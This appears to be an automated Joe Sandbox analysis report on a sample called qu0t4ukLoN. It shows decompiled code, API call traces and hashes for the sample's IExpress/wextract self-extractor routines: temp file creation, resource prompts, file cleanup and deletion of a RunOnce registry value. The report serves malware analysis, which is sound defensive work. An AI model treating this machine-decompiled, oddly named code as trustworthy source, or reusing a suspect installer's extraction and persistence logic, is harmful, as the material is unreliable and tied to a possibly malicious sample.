                                                                                                                                                                                                        • Opcode ID: 0d190c5f7c09f693ec3dc25e9426cd619951a062ef5689110669add2940c30f1
                                                                                                                                                                                                        • Instruction ID: 8468f1fb4b00f8bc32ff58e64bbdb3b1cc3b45e0c69e0036a57ca973261bc289
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d190c5f7c09f693ec3dc25e9426cd619951a062ef5689110669add2940c30f1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2341E031B942259BDF21DBA8D9157AA77F4FF457A0F24411BE841E7290EF7848428BA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A958C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 a958c8-a958d5 632 a958d8-a958dd 631->632 632->632 633 a958df-a958f1 LocalAlloc 632->633 634 a95919-a95959 call a91680 call a9658a CreateFileA LocalFree 633->634 635 a958f3-a95901 call a944b9 633->635 639 a95906-a95910 call a96285 634->639 645 a9595b-a9596c CloseHandle GetFileAttributesA 634->645 635->639 644 a95912-a95918 639->644 645->639 646 a9596e-a95970 645->646 646->639 647 a95972-a9597b 646->647 647->644
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00A958C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00A91680(_t20, _t36, _t33);
					E00A9658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0xa99124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0xa99124 = E00A96285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                        0x00a958cd
                                                                                                                                                                                                        0x00a958d1
                                                                                                                                                                                                        0x00a958d3
                                                                                                                                                                                                        0x00a958d5
                                                                                                                                                                                                        0x00a958d8
                                                                                                                                                                                                        0x00a958d8
                                                                                                                                                                                                        0x00a958da
                                                                                                                                                                                                        0x00a958db
                                                                                                                                                                                                        0x00a958e1
                                                                                                                                                                                                        0x00a958ed
                                                                                                                                                                                                        0x00a958f1
                                                                                                                                                                                                        0x00a9591e
                                                                                                                                                                                                        0x00a9592c
                                                                                                                                                                                                        0x00a95943
                                                                                                                                                                                                        0x00a9594a
                                                                                                                                                                                                        0x00a9594d
                                                                                                                                                                                                        0x00a95953
                                                                                                                                                                                                        0x00a95959
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9595b
                                                                                                                                                                                                        0x00a9595c
                                                                                                                                                                                                        0x00a95963
                                                                                                                                                                                                        0x00a9596c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95972
                                                                                                                                                                                                        0x00a95974
                                                                                                                                                                                                        0x00a9597a
                                                                                                                                                                                                        0x00a9597a
                                                                                                                                                                                                        0x00a9596c
                                                                                                                                                                                                        0x00a958f3
                                                                                                                                                                                                        0x00a95901
                                                                                                                                                                                                        0x00a95906
                                                                                                                                                                                                        0x00a9590b
                                                                                                                                                                                                        0x00a95910
                                                                                                                                                                                                        0x00a95910
                                                                                                                                                                                                        0x00a95918

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A958E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-2139698323
                                                                                                                                                                                                        • Opcode ID: d6a8b7487451971e48956d65ef09825dc01c05595765df92e432c0eddd8ad861
                                                                                                                                                                                                        • Instruction ID: b6db20f54a5770bb6dd566dbcb19bb52f17e30fe2b23cae3fe78ea5cf56fef1d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6a8b7487451971e48956d65ef09825dc01c05595765df92e432c0eddd8ad861
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA11E671B0021077DB249FB96C4EA9B7ED9EF46360B104617B505D7191DE70980687A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A951E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A951E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E00A9468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E00A9468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E00A944B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0xa99124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0xa99124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0xa99124 = 0x80070714;
					goto L10;
				}
				E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xa99124 = E00A96285();
				goto L10;
			}






                                                                                                                                                                                                        0x00a951fb
                                                                                                                                                                                                        0x00a95207
                                                                                                                                                                                                        0x00a9520b
                                                                                                                                                                                                        0x00a9523c
                                                                                                                                                                                                        0x00a95268
                                                                                                                                                                                                        0x00a95270
                                                                                                                                                                                                        0x00a9528b
                                                                                                                                                                                                        0x00a95293
                                                                                                                                                                                                        0x00a9529c
                                                                                                                                                                                                        0x00a952a6
                                                                                                                                                                                                        0x00a952b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a952b0
                                                                                                                                                                                                        0x00a9529e
                                                                                                                                                                                                        0x00a95279
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9527b
                                                                                                                                                                                                        0x00a95273
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95273
                                                                                                                                                                                                        0x00a9524a
                                                                                                                                                                                                        0x00a95250
                                                                                                                                                                                                        0x00a95256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95256
                                                                                                                                                                                                        0x00a95219
                                                                                                                                                                                                        0x00a95223
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F4D,?,00000002,00000000), ref: 00A95201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A95250
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                          • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 24280a97fac5998bfa6bb2d783bdee5a779bd89293e5af578f831db76d5d7c3c
                                                                                                                                                                                                        • Instruction ID: d13b387dfa6694a32ffb6a6644f15a638ebaaab004fe25faf94247dee9a53c51
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24280a97fac5998bfa6bb2d783bdee5a779bd89293e5af578f831db76d5d7c3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF11E6B1B006017BDF55ABB55D4AF7B61EDEBDD340B10442FB602D5190DE788C024264
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A952B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E00A952B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0xa98004; // 0x6298f871
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0xa991e0; // 0x31c8320
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0xa98a24 == 0 &&  *0xa99a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0xa98a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0xa98a24 == 0 &&  *0xa99a30 == 0) {
					_push(_t22);
					E00A91781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					if(( *0xa99a34 & 0x00000020) != 0) {
						E00A965E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00A92390( &_v268);
					_t11 =  *0xa98a20; // 0x0
				}
				if( *0xa99a40 != 1 && _t11 != 0) {
					_t11 = E00A91FE1(_t22); // executed
				}
				 *0xa98a20 =  *0xa98a20 & 0x00000000;
				return E00A96CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                        0x00a952b6
                                                                                                                                                                                                        0x00a952b6
                                                                                                                                                                                                        0x00a952b6
                                                                                                                                                                                                        0x00a952c1
                                                                                                                                                                                                        0x00a952c8
                                                                                                                                                                                                        0x00a952cb
                                                                                                                                                                                                        0x00a952cc
                                                                                                                                                                                                        0x00a952d4
                                                                                                                                                                                                        0x00a952d6
                                                                                                                                                                                                        0x00a952d7
                                                                                                                                                                                                        0x00a952de
                                                                                                                                                                                                        0x00a952e0
                                                                                                                                                                                                        0x00a952f2
                                                                                                                                                                                                        0x00a952fa
                                                                                                                                                                                                        0x00a952fa
                                                                                                                                                                                                        0x00a95302
                                                                                                                                                                                                        0x00a95305
                                                                                                                                                                                                        0x00a9530c
                                                                                                                                                                                                        0x00a95312
                                                                                                                                                                                                        0x00a95316
                                                                                                                                                                                                        0x00a95316
                                                                                                                                                                                                        0x00a95317
                                                                                                                                                                                                        0x00a9531c
                                                                                                                                                                                                        0x00a9531f
                                                                                                                                                                                                        0x00a95333
                                                                                                                                                                                                        0x00a95345
                                                                                                                                                                                                        0x00a95351
                                                                                                                                                                                                        0x00a95359
                                                                                                                                                                                                        0x00a95359
                                                                                                                                                                                                        0x00a95363
                                                                                                                                                                                                        0x00a95369
                                                                                                                                                                                                        0x00a9536f
                                                                                                                                                                                                        0x00a95374
                                                                                                                                                                                                        0x00a95374
                                                                                                                                                                                                        0x00a95381
                                                                                                                                                                                                        0x00a95387
                                                                                                                                                                                                        0x00a95387
                                                                                                                                                                                                        0x00a9538f
                                                                                                                                                                                                        0x00a953a0

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(031C8320,00000080,?,00000000), ref: 00A952F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(031C8320), ref: 00A952FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(031C8320,?,00000000), ref: 00A95305
                                                                                                                                                                                                        • LocalFree.KERNEL32(031C8320), ref: 00A9530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00A911FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A95363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A95334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-2312194364
                                                                                                                                                                                                        • Opcode ID: d552b8497429f960642a32042e7c6f85c6b7d6fd1333ae6b9ef742a1f51ac408
                                                                                                                                                                                                        • Instruction ID: a312f06bb88c8a8486a8d93cdd3a52ee05c340da98bff0678e48864552fdbb6a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d552b8497429f960642a32042e7c6f85c6b7d6fd1333ae6b9ef742a1f51ac408
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9721AE31B00614EBDF22DBB4ED1AB6A77E4FB14790F04025BE8469A5A0CFB45C86CB84
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A91FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A91FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0xa98530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                        0x00a91fee
                                                                                                                                                                                                        0x00a92005
                                                                                                                                                                                                        0x00a9200d
                                                                                                                                                                                                        0x00a92017
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92020
                                                                                                                                                                                                        0x00a9200d
                                                                                                                                                                                                        0x00a92029

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A9538C,?,?,00A9538C), ref: 00A92005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(00A9538C,wextract_cleanup0,?,?,00A9538C), ref: 00A92017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00A9538C,?,?,00A9538C), ref: 00A92020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 849931509-702805525
                                                                                                                                                                                                        • Opcode ID: 1b9a31da2d4186c0842ea8758fdef947e2870fc1ab8b700e40246f2b5142e5bd
                                                                                                                                                                                                        • Instruction ID: 143594f1e4402c041475459e99bee38d147c74548b5dab5d26b20b65bf4c800c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b9a31da2d4186c0842ea8758fdef947e2870fc1ab8b700e40246f2b5142e5bd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40E01A30750218BBDB218BD0AC0AF697AA9F711741F100197B905A0060EF655E15D645
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A94CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00A94CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0xa98004; // 0x6298f871
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0xa991d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00A94E99(_t75);
						L35:
						return E00A96CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0xa98584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0xa991e4;
						_t58 = 0xa991e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0xa991e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0xa991e4;
						_t30 = E00A94702( &_v268, 0xa991e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E00A9476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00A94980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E00A947E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0xa993f4 =  *0xa993f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0xa991e4;
						_t63 = 0xa991e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0xa991e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0xa991e4;
						_t30 = E00A94702( &_v268, 0xa991e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00A94C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00A94B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00A94B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                        0x00a94cd0
                                                                                                                                                                                                        0x00a94cdb
                                                                                                                                                                                                        0x00a94ce0
                                                                                                                                                                                                        0x00a94ce2
                                                                                                                                                                                                        0x00a94cee
                                                                                                                                                                                                        0x00a94cf2
                                                                                                                                                                                                        0x00a94d0e
                                                                                                                                                                                                        0x00a94d0e
                                                                                                                                                                                                        0x00a94d11
                                                                                                                                                                                                        0x00a94e83
                                                                                                                                                                                                        0x00a94e88
                                                                                                                                                                                                        0x00a94e98
                                                                                                                                                                                                        0x00a94e98
                                                                                                                                                                                                        0x00a94d17
                                                                                                                                                                                                        0x00a94d17
                                                                                                                                                                                                        0x00a94d1a
                                                                                                                                                                                                        0x00a94d2f
                                                                                                                                                                                                        0x00a94d2f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d2f
                                                                                                                                                                                                        0x00a94d1c
                                                                                                                                                                                                        0x00a94d1c
                                                                                                                                                                                                        0x00a94d1f
                                                                                                                                                                                                        0x00a94dcb
                                                                                                                                                                                                        0x00a94dd0
                                                                                                                                                                                                        0x00a94dd2
                                                                                                                                                                                                        0x00a94ddd
                                                                                                                                                                                                        0x00a94ddd
                                                                                                                                                                                                        0x00a94de3
                                                                                                                                                                                                        0x00a94de8
                                                                                                                                                                                                        0x00a94ded
                                                                                                                                                                                                        0x00a94ded
                                                                                                                                                                                                        0x00a94def
                                                                                                                                                                                                        0x00a94df0
                                                                                                                                                                                                        0x00a94df0
                                                                                                                                                                                                        0x00a94df4
                                                                                                                                                                                                        0x00a94df4
                                                                                                                                                                                                        0x00a94df6
                                                                                                                                                                                                        0x00a94df9
                                                                                                                                                                                                        0x00a94dfc
                                                                                                                                                                                                        0x00a94dfc
                                                                                                                                                                                                        0x00a94dfe
                                                                                                                                                                                                        0x00a94dff
                                                                                                                                                                                                        0x00a94dff
                                                                                                                                                                                                        0x00a94e03
                                                                                                                                                                                                        0x00a94e08
                                                                                                                                                                                                        0x00a94e0a
                                                                                                                                                                                                        0x00a94e0f
                                                                                                                                                                                                        0x00a94d03
                                                                                                                                                                                                        0x00a94d03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94d03
                                                                                                                                                                                                        0x00a94e18
                                                                                                                                                                                                        0x00a94e20
                                                                                                                                                                                                        0x00a94e25
                                                                                                                                                                                                        0x00a94e27
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94e33
                                                                                                                                                                                                        0x00a94e38
                                                                                                                                                                                                        0x00a94e3a
                                                                                                                                                                                                        0x00000000
